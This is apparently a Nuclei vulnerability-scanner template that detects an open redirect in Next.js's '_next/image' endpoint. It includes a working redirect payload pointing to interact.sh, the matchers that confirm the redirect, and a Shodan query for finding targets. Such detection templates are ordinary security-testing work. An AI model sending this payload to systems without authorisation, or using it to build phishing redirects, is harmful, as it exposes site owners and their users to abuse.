id: nextjs-redirect

info:
  name: Next.js <1.2.3 - Open Redirect
  author: DhiyaneshDk
  severity: medium
  description: Next.js contains an open redirect via “_next/image” due to improper path parsing.
  remediation: Upgrade to Next.js version 1.2.3 or higher.
  reference:
    - https://github.com/netlify/netlify-ipx/security/advisories/GHSA-9jjv-524m-jm98
    - https://samcurry.net/universal-xss-on-netlifys-next-js-library/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cwe-id: CWE-601
  metadata:
    shodan-query: html:"/_next/static"
  tags: redirect,nextjs

requests:
  - method: GET
    path:
      - '{{BaseURL}}/_next/image?url=/\/\interact.sh/&q=100&w=128&h=128'

    matchers-condition: and
    matchers:
      - type: word
        part: header
        words:
          - 'Location: /\/\/interact.sh'

      - type: status
        status:
          - 308

# Enhanced by cs 03/27/2023
